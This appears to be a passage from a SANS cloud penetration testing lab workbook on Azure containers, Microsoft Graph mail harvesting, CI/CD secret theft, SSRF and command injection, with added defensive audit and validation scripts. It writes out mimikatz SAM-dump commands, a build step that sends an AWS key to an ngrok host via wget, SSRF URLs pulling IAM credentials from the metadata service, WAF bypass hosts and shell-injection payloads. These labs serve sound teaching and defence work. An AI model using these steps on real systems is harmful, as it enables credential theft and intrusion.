We can however attempt to try and work around this; after all, we are hacking, are we not? Let's explore the Azure login options:

Let's open the MATE terminal so that we can launch az:

Once the terminal is open type the following commands:

Validate that you are logged in as Jerry:

$ az account show

If you are not, use the previous exercises to log in as jerry.

If we want to use a private Azure Container Registry we can; first we need the name of the container registry:

az acr list -o table

From here we can log in:

az acr login --name sec588class

You can use the username jerry@sec588.com; by now you should have the password.

To list the containers in the registry:

az acr repository list --name sec588class

We are not going to use the internal container registry, but why? The internal container registry will require a large number of items to have been checked off: Azure KeyVault, Azure SAS Tokens, and other authentication information to get the Container Infrastructure to authenticate to the registry and deploy an image.

Our image isn't all that special, so let's do something else; let's pull the same container from the official public Docker Hub registry:

az container create --resource-group shared-resource-group --name studentX-container --image mosesrenegade/microburst_dev --os Windows

This command may take more than 5 minutes to run, because Windows Containers are massive!

What is in microburst_dev? Let's discuss what we have done in this container. This container was built using a specific Dockerfile which we will show you below:

FROM mcr.microsoft.com/windows/servercore:ltsc2019
LABEL maintainer="moses@moses.io"

# Tooling directory and a local account inside the image
RUN mkdir C:\tools
RUN net user jerry redacted /add
COPY mimikatz C:/tools/
COPY microburst C:/tools/
# Azure CLI (MSI) and the AzureRM PowerShell module
RUN powershell -noP -sta "Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec -Wait -ArgumentList '/I AzureCLI.msi /quiet'"
RUN powershell.exe -noP -sta "Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force"
RUN powershell.exe -noP -sta "Install-Module -Name AzureRM -Scope CurrentUser -confirm"
# IIS plus the ServiceMonitor entrypoint that keeps w3svc in the foreground
RUN powershell -Command Add-WindowsFeature Web-Server; Invoke-WebRequest -UseBasicParsing -Uri "https://dotnetbinaries.blob.core.windows.net/servicemonitor/2.0.1.6/ServiceMonitor.exe" -OutFile "C:\ServiceMonitor.exe"
EXPOSE 80
ENTRYPOINT ["C:\\ServiceMonitor.exe", "w3svc"]

What does this container do? This container was an experiment by the author: could you push obviously malicious payloads into a live container environment? The answer is yes, but there are many caveats:

1. The command execution environment wraps in a very strange way, which will not yield a perfectly running shell.
2. There are issues executing certain commands from outside of items like PowerShell.

What the author recommends is to copy a backdoor binary like a Metasploit payload to connect back to you. Once the container is in place, let's execute a few jobs:

$ az container exec --exec-command "powershell.exe" --name studentX-container --resource-group shared-resource-group

This container will now execute and attach a shell to you, a PowerShell runtime binary.

If you overrun the shell by typing the following:

C:\ PS> dir C:\\Windows

What you quickly find out is that the shell is extremely limited and the wrapping of the shell is broken.

You can look around the system that is running Kubernetes; for example you can:

C:\ PS> dir C:\\var

This is where secrets may be stores, in which there is none.

3e1e3b497543e6c11ac8e4188959c93e
Some of the oddities of this shell? Meterpreter is caught when run in .exe, not caught when run in a di erent
language like powershell. Mimikatz is also not prevented, oddly enough.

If you have extra time

You can attempt to run mimikatz to dump the SAM contents from within the shell like so:

C:\ PS> cd tools\

This will BREAK in your shell; you will not see more than 2 or 3 lines.

C:\ PS> .\mimikatz.exe

This will enable the mimikatz.log:

mimikatz # log

Turn on Privilege Debug:

mimikatz # privilege::debug

mimikatz # lsadump::sam

mimikatz # exit

Please note you will now get the following errors:

ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

These errors are new to the Azure Container environment (0x00000005 is ERROR_ACCESS_DENIED) and could indicate further hardening from Microsoft to prevent unauthorized LSASS reads in the container.

At this point you may have a log file in C:\Tools\mimikatz.log. You will need a way to obtain it: maybe you can ftp it out or use a different mechanism to get this log to you. Potentially you can serve it up in the IIS server running on the device; you may have to change the name from .log to .html to retrieve the file.
Conclusion

This lab is the beginning of a cursory tour of the az tool. The tool itself can be wielded both for legitimate system administration and for our own use in a penetration test, if we understand how to navigate the system. Just like the aws tool, the az tool works at the control plane layer and could circumvent some of the traditional controls we may have put into a system.

Why this lab is important

Over the next few labs, we will be using this tool to implement our actions. Getting familiar with how to use the tool for reconnaissance gathering, listing of permissions and more will be critical.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 3.7: Microsoft Graph and Postman API

Brief Intro

Microsoft Graph is a new SDK and API that allows for a programmable way to access Microsoft-specific services. While Microsoft Graph has been around in some form for a while, it was never more important or relevant than when the CEO of Microsoft "deprioritized" Windows for Microsoft Graph (http://bit.ly/2SDgAqO).

Microsoft Graph, while powerful, is not as simple as it may seem. Permissions for Microsoft Graph are critical, and full-on Application permissions even more so. We will be playing around with understanding how these API keys can be built and what can be done with them.

What is more alarming is the amount of confidential, sensitive, private or otherwise restricted information that is still being emailed as part of the operational processes of an organization. What we are going to do in this lab is data mine that information.

Requirements for This Lab

This lab requires the student to have:

A web browser
Postman, the API browser.

Try It Yourself

If you wish to try this on your own:

1. Login to the Azure Portal.
2. Find the Postman App Registration in Azure Active Directory.
3. Using the Postman App, create a Client Secret named StudentX-Postman.
4. Configure Postman to connect to Microsoft Graph and query Summer's email.
5. Once you have Summer's email, try and download the file in a sensitive email.

Walkthrough

Getting ready with Azure AD Roles

We will first begin by logging into the Azure Portal using Firefox, which is found on the Desktop of the VM.

Navigate to https://portal.azure.com and login as jerry@sec588.com with his account. Once you are logged in, navigate to Azure Active Directory.

Once you are at Azure Active Directory locate: App Registrations.

Under the column Display Name, click on the Postman-API name.

We have pre-built a Postman application for you. Consider that this could be an internal application; it could be called anything. It could even be a Microsoft PowerBI or an in-house Microsoft Graph application. Either way, you as an attacker have this access. How can you leverage it?

First let's note a few items on the main page; record the following:

Application (client) Id
Directory (tenant) Id

Now let's click on API Permissions. Here we can see that this app has a few elevated permissions:

Files.Read: This is a user-based (delegated) permission. It applies to whichever user the application acts on behalf of, and will read the files for that user in OneDrive.

User.Read: This is a user-based (delegated) permission. It applies to whichever user the application acts on behalf of, and will read that user's information.

There are other permissions:

Mail.Read.All: This is an application-based permission. It applies globally and will read ALL users' mail.

Files.Read.All: This is an application-based permission. It applies globally and will read ALL users' files in OneDrive.

User.Read.All: This is an application-based permission. It applies globally and will read ALL the users in the SEC588 Azure Active Directory graph.

How can we backdoor this access and get access to the API? Let's add our own Client Secret to start. Navigate to the Certificates & Secrets menu. From within this menu add a New Client Secret, for One Year, and name it StudentX-Postman.

Copy the value. It will only be shown once.

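The permissions listed above and the secret just created are exactly what a tenant administrator should be auditing. As an added example (not part of the SANS workbook or any Microsoft SDK), the following Python script audits a constructed record modelled on the Postman-API registration: it lists the application-type '.All' permissions and flags client secrets that were added recently, exceed a lifetime policy, or have expired. The record's simplified permission list, the Postman-Dev secret, the timestamps and the audit time are all assumptions.

```python
"""Audit an Azure AD app registration for tenant-wide Graph permissions and
client-secret hygiene. Added example for this workbook, not SANS or Microsoft code."""
from datetime import datetime, timedelta, timezone

# Constructed record modelled on the lab's Postman-API registration as the portal
# shows it. The permission list is simplified to name + type; Graph's own
# requiredResourceAccess structure identifies permissions by GUID instead.
POSTMAN_API = {
    "displayName": "Postman-API",
    "permissions": [
        {"name": "Files.Read", "type": "Delegated"},
        {"name": "User.Read", "type": "Delegated"},
        {"name": "Mail.Read.All", "type": "Application"},
        {"name": "Files.Read.All", "type": "Application"},
        {"name": "User.Read.All", "type": "Application"},
    ],
    # passwordCredentials uses the field names of the Graph application resource.
    "passwordCredentials": [
        {"displayName": "Postman-Dev",            # constructed pre-existing secret
         "startDateTime": "2019-09-01T00:00:00Z", "endDateTime": "2021-09-01T00:00:00Z"},
        {"displayName": "Student1-Postman",       # the one-year secret added in this lab
         "startDateTime": "2020-07-28T14:05:00Z", "endDateTime": "2021-07-28T14:05:00Z"},
    ],
}
NOW = datetime(2020, 7, 28, 16, 0, tzinfo=timezone.utc)  # constructed audit time


def tenant_wide_permissions(app):
    """Application permissions run as the app itself with no signed-in user, so a
    '.All' application permission reaches every mailbox, drive or user in the tenant.
    Delegated permissions are bounded by what the signed-in user can already see."""
    return sorted(p["name"] for p in app["permissions"]
                  if p["type"] == "Application" and p["name"].endswith(".All"))


def _utc(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def secret_findings(app, now=NOW, recent_days=7, max_lifetime_days=365):
    """Return (credential name, issue) pairs. A fresh secret appearing on an
    existing app is what the 'backdoor' step above looks like from the tenant side."""
    findings = []
    creds = app["passwordCredentials"]
    if len(creds) > 1:
        findings.append(("*", "multiple-secrets"))
    for cred in creds:
        start, end = _utc(cred["startDateTime"]), _utc(cred["endDateTime"])
        if timedelta(0) <= now - start <= timedelta(days=recent_days):
            findings.append((cred["displayName"], "recently-added"))
        if end - start > timedelta(days=max_lifetime_days):
            findings.append((cred["displayName"], "lifetime-exceeds-policy"))
        if end < now:
            findings.append((cred["displayName"], "expired-but-still-present"))
    return findings


def audit(app, now=NOW):
    """Combine both checks into one report for a registration."""
    return {
        "app": app["displayName"],
        "tenant_wide": tenant_wide_permissions(app),
        "secrets": secret_findings(app, now),
    }


if __name__ == "__main__":
    report = audit(POSTMAN_API)
    print(f"{report['app']}: tenant-wide permissions {report['tenant_wide']}")
    for name, issue in report["secrets"]:
        print(f"  secret {name}: {issue}")
```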
Armed with these values we can now configure Postman.

Postman Configuration

Let's open the MATE terminal so that we can launch Postman.

Once the terminal is open, type the following commands:

$ cd /opt/postman
$ ./Postman

We will need to download and install the collection. To do so, visit this link:

Postman Microsoft Graph (http://bit.ly/2OFCYi9)

Copy the following URLs:

https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-collections/master/Microsoft%20Graph.postman_collection.json

https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-collections/master/Microsoft%20Graph.postman_environment.json

To import them, use the Import function of Postman. From here click 'Import' and enter the URL.

Once this is done we can then move on to the next part.

In the top right corner, change the Environment to Microsoft Graph.

Finally, click on the eyeball to configure the environment.

With the eyeball clicked you will see several values:

ClientId
ClientSecret
TenantId

And there are two that you do not have: the first one is AppAccessToken and the second is UserAccessToken.

Let's fill these in as the CURRENT VALUE and make sure to hit ENTER after each value is put in.

ClientId will be the value: Application (client) Id
TenantId will be the value: Directory (tenant) Id
ClientSecret will be the one-time token that you created as the Student1-Postman secret.

Put in these values.

Let's create a new request: click the + to open a new tab and make a POST request to:

https://login.microsoftonline.com/{{TenantID}}/oauth2/v2.0/token

You will also need to make a few changes:

Click the Body button and choose: x-www-form-urlencoded

The URL-encoded area will need a few rows to be added. These are case sEnSiTiVe:

Key: grant_type     Value: client_credentials
Key: client_id      Value: {{ClientID}}
Key: client_secret  Value: {{ClientSecret}}
Key: scope          Value: https://graph.microsoft.com/.default

Once you have done this click: SEND

At the bottom of the response you should see a JSON body with the key "access_token". Copy its value without the surrounding quotes. This is your AppAccessToken.


Using Graph to find Emails

You can play with any of the queries you want. The way you will run a query is to use one of the ones you have permission to, that is, either "Mail" or "Users".

For Mail, let's click Get a User's Messages. This will get all the messages of a specific user.

If you look at the URL it shows {{UserId}}. Clicking send now will give you an error because the {{UserId}} is blank. If we wish to use this, click the eyeball once again and, under Current Value, let's put in summer@sec588.com.

Clicking send, we now see mail for summer.

If you look at the JSON carefully, let's take a look at some areas:

bodyPreview: Summer this is sensitive
webLink: The weblink of the message
sender: George Georgeson, a Global Admin.

Summer received some type of special file, and I would assume that this is potentially useful for us to have. Since we have Summer's username and password we can login and retrieve this file. If not, we would need to find a different way.

Go to https://outlook.office365.com. If you are logged in as jerry, just switch users or login as summer.

You can locate the email message now and even download the file, which is an SSH key. Keep this key for a future lab.

Conclusion

There are tools today like MailSniper that are designed to use the Office 365 APIs to try and extract emails from the system. As the Microsoft Graph API and other similar APIs are universally built at Microsoft, we will need to keep an eye on the APIs. There may not be a tool designed to harvest this information on day one, but understanding how the tool will work by using developer-focused tools like Postman could help us expedite the ability to abuse these sources of information.

Why this lab is important

Microsoft Graph is a treasure trove of information. While you may not have direct access to all of the sources of data directly, you could attempt to indirectly access the system by leveraging the Microsoft Graph API in a pseudo out-of-band way. It would be ideal if administrators always looked at where they have deployed keys and rotated them often.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 4.1: Backdoors in CI/CD Pipelines

Brief Intro

The CI/CD pipeline is a critical part of the software supply chain. CI stands for Continuous Integration and CD for Continuous Delivery. The word Continuous is only possible through automation. If you can poison or find your way into a CI/CD pipeline you can start to very much harm a system and introduce many attack vectors. This lab does not demonstrate a full payload attack because the terms of service of the CI pipeline may be violated; however, we will demonstrate extraction of sensitive data supplied by the author.

Requirements for This Lab

This lab will require you to have completed the Microsoft Graph lab. You will also need the following items:

ssh
ngrok
A working python environment
git
An Internet connection

Try It Yourself

To attempt this lab yourself you must do the following items:

1. Obtain the keys that are downloaded as 'day4'.
2. Use it to download the following repository in the workdir area: git clone https://www.github.com/mosesrenegade/sec588-day4
3. Create a branch with your student number.
4. Start an ngrok http session and a python listener.
5. Commit your branch with the changes to the .travis.yml file.
6. Use the commit to extract the hidden AWS keys that are located in the travis system.

Walkthrough

Moving SSH Keys Around

To get started, we will begin by using the SSH key that we found in our email in Section 3.7. If you recall, you downloaded it as: day4

When we do this step our wiki-updater.sh will break; you need to restore this script for it to continue to work.

This file should be located in /home/sec588/Downloads.

Let's open the MATE terminal so that we can modify some settings.

Once the terminal is open, type the following commands:

$ cp /home/sec588/Downloads/day4 /home/sec588/.ssh/day4
$ cd /home/sec588/.ssh/

First thing we need to do is make the ssh key usable by setting permissions:

$ chmod 400 day4

We also need to modify the config file.

$ nano config

The file will ship like this:

host github.com
  Hostname github.com
  IdentityFile ~/.ssh/sec588-wiki-vm-keys
  User git

Given that international keyboards do not necessarily support ~, let's do two things: comment out the IdentityFile that exists and add our new one.

host github.com
  Hostname github.com
  #IdentityFile ~/.ssh/sec588-wiki-vm-keys
  IdentityFile /home/sec588/.ssh/day4
  User git

Remember that CTRL+X will save the file and exit in nano.

Copying our Repository

We can now use the SSH configuration to push and pull items. While we could spend days or weeks figuring out what this file does, we are going to shortcut this process by telling you that this key will allow you to deploy into a specific repository, so let's play with this. The first thing we will do is pull the repository down:

$ cd /home/sec588/files/workdir
$ git clone https://www.github.com/mosesrenegade/sec588-day4

$ cd sec588-day4

This will allow you to clone down the repo for this lab. The next thing you will need to do is modify the git repository so that you can push changes:

$ git remote -v

This will allow you to check out the current setting. Let's change it to SSH:

$ git remote set-url origin git@github.com:mosesrenegade/sec588-day4

Now we should see the changes by typing:

$ git remote -v

At this point we are ready to look at our files. Switch directory into the sec588-day4.

$ cd sec588-day4

We have two files that could be useful. The first one is 'Dockerfile'; we could poison this file with a backdoor. Instead, what we will concentrate on is extracting information from the .travis.yml.

Below is a screenshot of the travis build:


Wouldn't it be valuable to extract AWS keys or other sensitive information? The AWS keys could be used to connect to a private repository or maybe more. Let's show you how to obtain them.

Let's open the MATE terminal so that we can open ngrok.


Once the terminal is open, type the following commands:

$ ngrok http 8888

Let's open another MATE terminal so that we can open python.

Once the terminal is open, type the following commands:

$ python -m 'SimpleHTTPServer' 8888

(SimpleHTTPServer is the Python 2 module; the Python 3 equivalent is python3 -m http.server 8888.)

Right now you should have three terminal windows:

ngrok window
simplehttpserver window
day4 window

The three windows that we will have are shown below.


In the ngrok window you will see the following line:

Forwarding http://<randomurl> -> http://localhost:8888

Record the random URL; this is your internet address that will forward all traffic to your local computer.

Pushing a new Branch

The next thing we will do is check out a new branch:

$ git checkout -b studentX

After we have a new branch, the next thing we will do is open the .travis.yml file. You can use nano or whatever application you want to use to edit this file.

$ nano .travis.yml

Look at the travis file, specifically right after the section that reads:

after_success:
- docker --version

What we will do is modify it to read the following:


after_success:
- echo $AWS_ACCESS_KEY_ID
- wget http://ngrok-randomurl/`echo $AWS_ACCESS_KEY_ID`

We can now commit our branch to the GitHub repository, which should start a build:

$ git add .

You can put anything you want in the comment:

$ git commit -m 'Our Fun Commit'
$ git push origin studentX

This will push our branch to GitHub. It may take up to 5 minutes to create the build, but what should occur is a request to the URL that reads out an environment variable, in our case AWS_ACCESS_KEY_ID.

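From the defender's side, the change just pushed is visible both in the .travis.yml diff and in the command text itself. As an added example (not code from the workbook, Travis CI or the sec588-day4 repository), the following Python script parses the command phases of a .travis.yml, flags steps that print or transmit a credential-looking environment variable, and reports the commands a branch adds relative to a trusted baseline; the two sample files, the ngrok-randomurl host and the variable-name patterns are constructed.

```python
"""Flag pipeline steps that leak secrets from a .travis.yml. Added example for
this workbook, not SANS or Travis CI code; the sample files are constructed."""
import re

# Top-level Travis phases whose list items are shell commands.
COMMAND_PHASES = {"before_install", "install", "before_script", "script",
                  "after_success", "after_failure", "after_script", "before_deploy"}
# Environment variables whose names look like credentials (constructed pattern).
SECRET_VAR = re.compile(r"\$\{?([A-Z0-9_]*(?:SECRET|TOKEN|KEY|PASSWORD|PASS)[A-Z0-9_]*)\}?")
# Tools that move data off the build host.
NETWORK_TOOL = re.compile(r"\b(wget|curl|nc|ncat|netcat|ssh|scp|ftp|dig|nslookup)\b")
# Commands that write their arguments to the (often public) build log.
LOG_WRITER = re.compile(r"^(echo|printf|env|printenv|set|cat)\b")

# Constructed baseline, modelled on the lab's original file.
BASELINE = """\
language: python
services:
  - docker
script:
  - docker build -t sec588-day4 .
after_success:
  - docker --version
"""
# The branch pushed in this lab: after_success rewritten to read the key out.
MODIFIED = BASELINE.replace(
    "  - docker --version\n",
    "  - echo $AWS_ACCESS_KEY_ID\n"
    "  - wget http://ngrok-randomurl/`echo $AWS_ACCESS_KEY_ID`\n")


def parse_phases(text):
    """Minimal parser for the YAML subset Travis files use: a top-level 'phase:'
    followed by '- command' items (indented or not). Inline scalars such as
    'language: python' and nested maps are skipped, so 'script: make' is missed."""
    phases, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        item = line.strip()
        if item.startswith("- "):
            if current is not None:
                phases[current].append(item[2:].strip())
            continue
        if not line[0].isspace():
            key, _, rest = line.partition(":")
            current = key.strip() if not rest.strip() else None
            if current is not None:
                phases.setdefault(current, [])
    return phases


def scan(text):
    """Return findings for commands that print or transmit a secret variable.
    Commands that use credentials implicitly (aws, docker login) are out of scope."""
    findings = []
    for phase, commands in parse_phases(text).items():
        if phase not in COMMAND_PHASES:
            continue
        for cmd in commands:
            names = sorted(set(SECRET_VAR.findall(cmd)))
            if not names:
                continue
            if NETWORK_TOOL.search(cmd):
                issue = "secret passed to a network tool"
            elif LOG_WRITER.match(cmd):
                issue = "secret written to the build log"
            else:
                continue
            findings.append({"phase": phase, "command": cmd,
                             "issue": issue, "variables": names})
    return findings


def added_commands(base_text, head_text):
    """Commands in the proposed file that the trusted baseline lacks, per phase:
    what a reviewer of a branch build should be shown before secrets are exposed."""
    base, head = parse_phases(base_text), parse_phases(head_text)
    added = {}
    for phase, cmds in head.items():
        new = [c for c in cmds if c not in base.get(phase, [])]
        if new:
            added[phase] = new
    return added


if __name__ == "__main__":
    for phase, cmds in added_commands(BASELINE, MODIFIED).items():
        print(f"{phase}: {len(cmds)} new command(s)")
    for f in scan(MODIFIED):
        print(f"[{f['phase']}] {f['issue']}: {f['command']}")
```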

Conclusions

The ability for us to validate and understand the changes that occur in the most sensitive parts of our infrastructure environments will be paramount to understanding what is occurring in the overall architecture. Are defenders monitoring the most sensitive and critical files in their network? Is there something that they can do to make the environment better? This includes modifications to Dockerfiles and .travis.yml files, which are very sensitive files in an organization.

Remember you will need to revert the config file to update the wiki:

$ nano /home/sec588/.ssh/config

Please make it reflect the following:

host github.com
  Hostname github.com
  IdentityFile ~/.ssh/sec588-wiki-vm-keys
  #IdentityFile /home/sec588/.ssh/day4
  User git

This will allow wiki-updater.sh to work.

Why This Lab Is Important

This is important as more repositories become breached, more environment libraries are being moved from developers to hackers, and more keys are exposed. Demonstrating the true impact to an organization is critical for us to understand how attackers are taking over infrastructures and abusing the trust they have placed in many of their own deployment systems.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 4.2: SSRF Attack Lab

Brief Intro

This lab showcases the impacts of SSRF. This particular bug allows us to gain access into an environment by using the web application as a proxy to internal web applications. This would grant the user the capability of moving around an environment in a predictable way. One of the more important components of this would be to take this and consistently ask for URLs in the application to see if they exist. We can even inspect locally served files if we know what they are or can guess them.

Remember, microservices and cloud native applications use HTTP/HTTPS as an internal transport protocol for many of their services. Using the SSRF we can even start to look for other endpoints if we know what they are.

We will also attempt to cause an error; the error output of our lab will show what type of application this really is.

Requirements for This Lab

This lab requires the student to have:

A working internet connection, and access to the VM browser and access to cURL.

Try It Yourself

If you wish to try this on your own:

You will be getting the AWS keys to an EC2 worker node using the meta-data service from within a container.

1. Go to invoice.<class-subdomain>.sec588.net
2. Do not use a web browser to view the /url.
3. Find the URL that is located in the homepage that is '/url'.
4. Look at the URL GET request and attempt to execute a SSRF by:

   a. Trigger an error by going here: https://localhost:8080. Do not use a web browser for this step.
   b. Look at the http://localhost:8080/static/ssrf.html file that is hosted on the server and is readable by talking to the server and requesting it.
   c. Look at the local metadata service and provide us with the hostname, public-hostname, security-groups, and IAM info.
   d. Get the metadata service token.

Walkthrough

Getting started

Most of the labs in the Cloud Native Day are based on microservices. Our endpoint will be the following:

http://invoice.<class-subdomain>.sec588.net

Open Firefox and let's take a look at this particular site.

This application is built of multiple containers and, much like our picture, we will try and uncover the different components.

The first thing that we will do in our application is look at the way that SSRFs are designed. On the web page you will see a link to a /url. Click the link and it should take you to the following URL:

DO NOT CLICK ON THIS LINK BELOW, it will be different for your class

If you use a web browser for the step below it will FAIL, as the way the SSRF triggers may or may not load the jpg

http://invoice.<class-subdomain>.sec588.net/url?url=http://localhost:8080/static/ssrf.html

Let's trigger an error. For this step, and this step only, we will not use the browser.

Open a MATE terminal and type the following in:

$ curl -v 'http://invoice.<class-subdomain>.sec588.net/url?url=hrl?url=https://localhost:8080/'

WHAT WE ARE DOING HERE IS WE ARE CREATING A VERY UNIQUE ITEM

Also note if this hangs, CTRL-C and try again.

The URL shows up with the following items: url?url=hrl?url=http://localhost:8080/ and what this tells the library is that our URL is purposefully malformed, but the trailing / allows the system to execute this.

This will fail, but what is more interesting is that a DEBUG message appears.

What we will see is output that looks like a stack trace and debug line. Some of the words we will need to pay attention to:

requests.exceptions
/usr/local/lib/python3.6/

All of these are indicators that we are running in a python-based container. We may need this information later.

Let's see how this bug will impact us. First we should note that many default webservers do not run on a 'root' level port, that is, a port below 1024. We happen to see many servers running on ports like 8000, 8080, 8443, etc. We are going to start by guessing that this environment could be 8080, as the python stack trace showed it to be running Flask. Flask is commonly run on port 8080. Let's look:

http://invoice.<class-subdomain>.sec588.net/url?url=http://localhost:8080/

This should push our own local webserver into our page. A page within our page: inception. Remember back to Day 2 with our IAM and escalation examples; maybe this container is running in a cloud provider, maybe within EC2, or maybe within GCP. What we can start to understand is whether we have the capability to browse other internal pages using this page as a file reader. We do not yet know what the actual pages are; for that we will need a different bug. Let's however see if we can get further into the environment.

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/

From this point you should be looking at a nice view of the meta-data API. Let's explore what we know about this host:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/hostname

The hostname of this device is:

ip-192-168-<XX-YYY>.us-east-X.compute.internal

We can see this node is running in an IP range of 192.168.X.X in the us-east-1 datacenter. What else can we learn:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/public-hostname

The public hostname is something like: ec2-X-Y-Z-A.us-east-X.compute.amazonaws.com

We could also get an indication of the type of device by looking at security-group names and some other items:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/security-groups

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/iam/info

Each one of these queries has details about the type of device; the words 'eks' or 'eksctl' may give us some indication.

Let's take a look at what other credentials we can get:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

This will display the name of the role that we wish to query:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<rolename>

If you have additional time

Attempt to make these commands execute through command line tools such as: curl

Attempt a WAF bypass by obfuscating some of the items:

Instead of localhost try: http://127.1:8080 or http://0:8080/
Instead of just using /latest, try adding self-referencing URLs: /./

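The obfuscated hosts above defeat a string blocklist, which is what a /url endpoint or a WAF rule typically uses. As an added example (not the lab application's code), the following Python shows the naive check beside a hardened one that normalises host literals with inet_aton and ipaddress before comparing and re-checks every resolved address; the resolver callback, the example.test names and the sample resolutions are constructed.

```python
"""Validate a user-supplied fetch URL the way a /url proxy endpoint should.
Added example for this workbook, not the lab application's code."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def naive_allows(url):
    """The string blocklist an application or WAF rule commonly starts with.
    It lets the shorthand hosts from the page (127.1, 0) straight through."""
    host = urlsplit(url).hostname or ""
    return host not in {"localhost", "127.0.0.1", "169.254.169.254"}


def literal_address(host):
    """Return the IP address a host literal denotes, or None for a DNS name.
    socket.inet_aton applies the C library's shorthand rules, so '127.1' and '0'
    normalise to 127.0.0.1 and 0.0.0.0 instead of surviving a string compare.
    IPv4-mapped IPv6 literals such as ::ffff:169.254.169.254 are unwrapped."""
    if host in ("localhost", "localhost."):
        return ipaddress.ip_address("127.0.0.1")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        try:
            addr = ipaddress.IPv4Address(socket.inet_aton(host))
        except OSError:
            return None  # not a literal: must be resolved and re-checked
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return addr


def address_is_internal(addr):
    """Loopback, link-local (the metadata service), RFC 1918, unspecified,
    multicast and reserved ranges are never legitimate fetch targets here."""
    return (addr.is_loopback or addr.is_link_local or addr.is_private
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


def check_url(url, resolver=None):
    """Return (allowed, reason). resolver(host) -> [ip, ...] is supplied by the
    caller; the fetch must then connect to those same addresses so the check
    and the request cannot disagree (DNS rebinding)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False, "not an absolute http(s) URL"
    addr = literal_address(parts.hostname)
    if addr is not None:
        addrs = [addr]
    elif resolver is None:
        return False, "hostname not resolved"
    else:
        addrs = [literal_address(a) for a in resolver(parts.hostname)]
        if not addrs:
            return False, "hostname did not resolve"
    for a in addrs:
        if address_is_internal(a):
            return False, f"{parts.hostname} -> {a} is an internal address"
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://127.1:8080/", "http://0:8080/",
              "http://[::ffff:169.254.169.254]/latest/meta-data/"):
        print(u, "naive:", naive_allows(u), "hardened:", check_url(u))
```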

Why This Lab Is Important

This lab begins our Cloud Native Day. One of the core components of a cloud native application is its capability to properly handle URL inputs. We will see how this is impacting our tests going forward with the other components of this application.

Additional Resources

SANS SEC642: Advanced Web Application Penetration Testing (https://www.sans.org/sec642)

Lab 4.3: Command Injections in Cloud Native Applications

Brief Intro

Command Injection bugs are quite common given the amount of work that command line tools afford us. Even when command line tools are not directly called, we can manipulate existing software to inject operating system commands for us to use. We will be exploring two services in this lab: the /ping service and the invoice service.

One thing about these containers: unlike the last system, they are not running Python.

Requirements for This Lab

This lab requires the student to have:

Finished Lab 4.2

Have a stable internet connection, with a web browser and access to cURL.
Try It Yourself

If you wish to try this on your own:

1. You will find that within the http://invoice.<class-subdomain>.sec588.net lab there are multiple endpoints.

2. In the /ping endpoint you will find a common command line injection.

3. Using base64, pull out the contents of the ping.php file on the system to observe what the vulnerability is.

4. Look at the basics of the container that is running by trying to:

a. Read all environment variables

b. Find which applications are and are not installed on the container. How would you move a file onto it?

5. Find a way to execute commands through an RCE in NodeJS; the function is in the invoice search area.

a. Can you manipulate JavaScript in this POST?

b. As these commands are actually running in a URL, what do you have to modify to execute code?

c. Can you look through the file system? Can you run any commands?

Walkthrough

Direct Command Injection

Let's open our web browsing interface one more time.

$ firefox http://invoice.<class-subdomain>.sec588.net

This time we will be looking at two URL endpoints; the first one is our /ping process.

If we click on it we can enter anything we want to ping. Ping localhost on the machine:

127.0.0.1

This should show familiar output.

Running the ping command:

PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.055 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.033/0.044/0.055/0.000 ms

By running this command we should also notice that we may be able to trigger additional commands.

Hit the Back icon on the browser and let's try this:

127.0.0.1; ls

The output should reflect something like:

PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.035 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.053 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.035/0.044/0.053/0.000 ms
ping.php

We now see at the bottom of the page a new item: ping.php

It would appear our container is running a PHP process called ping. We can do a few things here.

First let's add a spacer:

127.0.0.1; echo "============"; ls

We now see a new set of actions below:

round-trip min/avg/max/stddev = 0.034/0.043/0.053/0.000 ms
========
ping.php

We cannot, however, view the contents of the PHP file:

127.0.0.1; echo "============"; cat ping.php

This will not show us anything. Why? Because the PHP engine is processing the PHP commands as code.

Let's try this:

127.0.0.1; echo "============"; cat ping.php | base64

We now can see a base64 encoded string. What you will see is something like this:

